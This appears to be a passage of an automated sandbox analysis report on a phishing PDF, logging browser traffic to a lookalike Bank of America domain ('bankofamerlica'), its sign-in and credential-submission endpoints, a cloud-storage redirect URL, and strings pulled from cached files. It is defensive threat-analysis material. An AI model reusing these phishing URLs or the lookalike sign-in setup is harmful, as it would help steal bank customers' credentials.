Source: global trafficHTTP traffic detected: GET /assets/fsd-secure-esp-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/help-qm-fsd.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/powered_by_logo.svg HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/special/js/main.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/pill.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/BofA_rgb.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/BOA.PNG HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/sign-in-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/fsd-secure-esp-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/help-qm-fsd.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/powered_by_logo.svg HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/gfoot-home-icon.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/help-qm-fsd-hover.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/gfootb-static-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/vipaa-v4-jawr-print.css HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/special/js/main.js HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/cnx-regular.woff HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://online.access.secure.bankofamerlica.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/BofA_rgb.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/sign-in-sprite.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/help-qm-fsd-hover.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/gfoot-home-icon.png HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.goAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/favicon.ico HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /submit.php HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/error-large.gif HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
Source: global trafficHTTP traffic detected: GET /assets/error-large.gif HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=1; ppath=auth/reset/reset-entry/
Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: online.access.secure.bankofamerlica.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: unknownHTTP traffic detected: POST /secure/secure.php HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveContent-Length: 76sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://online.access.secure.bankofamerlica.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: http://api.jqueryui.com/position/
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: http://bassistance.de/jquery-plugins/jquery-plugin-validation/
Source: 77EC63BDA74BD0D0E0426DC8F80085060.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: http://docs.jquery.com/Plugins/Validation
Source: chromecache_207.14.drString found in binary or memory: http://jquery.org/license
Source: chromecache_207.14.drString found in binary or memory: http://jqueryui.com
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: 0430tely.pdfString found in binary or memory: http://www.reportlab.com
Source: 0430tely.pdfString found in binary or memory: http://www.reportlab.com)
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: d52f2a14-5a7e-4fe8-9b3e-8660dd32ebfb.tmp.3.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: 0430tely.pdfString found in binary or memory: https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72)
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://fls.doubleclick.net/activityi
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://github.com/ded/bowser
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://github.com/jquery/jquery-color
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://npmcdn.com/jsencrypt
Source: chromecache_176.14.drString found in binary or memory: https://online.access.secure.bankofamerlica.com/?ref=9854tjwe46
Source: chromecache_207.14.drString found in binary or memory: https://secure.opinionlab.com
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card.asp?
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_d.asp
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_d.asp?
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp?r=
Source: chromecache_207.14.drString found in binary or memory: https://www.bankofamerica.com
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://www.bankofamerica.com/homepage/language-not-available.go?target=https://www.bankofamerica.co
Source: chromecache_208.14.dr, chromecache_207.14.drString found in binary or memory: https://www.bankofamerica.com/mweb/index.html?app=signon
Source: unknownNetwork traffic detected: HTTP traffic on port 59076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59101 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59107 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59103
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59066
Source: unknownNetwork traffic detected: HTTP traffic on port 59118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59067
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59100
Source: unknownNetwork traffic detected: HTTP traffic on port 59081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59107
Source: unknownNetwork traffic detected: HTTP traffic on port 59095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59114
Source: unknownNetwork traffic detected: HTTP traffic on port 59086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59077
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59076
